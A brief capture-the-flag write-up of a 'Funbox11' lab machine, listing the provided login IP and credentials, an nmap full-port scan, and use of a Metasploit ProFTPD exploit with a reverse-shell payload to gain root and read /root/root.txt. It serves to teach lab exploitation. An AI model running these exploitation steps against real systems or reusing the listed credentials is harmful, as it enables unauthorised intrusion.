image

Challenge

We were provided with this info

https://77.87.243.155
username: alpha
password: 900d1uck734m41ph4

image

and we will use it to login to the web kalIbox that we will use to solve the machine

Writeup

I had a little idea that they have the machine on the same box so Ichecked the hosts to know the ip

cat /etc/hosts

image

yup I was right the ip was there 192.168.204.3 funbox11

let’s scan it using nmap

I used this command

nmap -v -T4 -sC -sV -p-  192.168.204.3

there was a running service that caught my eye

image

and that was it Iuse metasploit to search for this service

serch ProFTPD

image

I tried the last 2 payloads and only number 5 worked

use 5

then Iwanted to see the payloads by using show payloads

image

I used the reverse one set payload 3

image

also I set the RHOST , LHOST and the LPORT

image

then I used show options to check if every thing was rigth

image

okay let’s start the attack by using run

image

it worked let’s use whoami to know the user that Ihave

that’s it I was root so let’s find the flag

as alwys it was /root/root.txt

just by sending

cd /root
cat root.txt

I got the flag

image

And pingo… that was it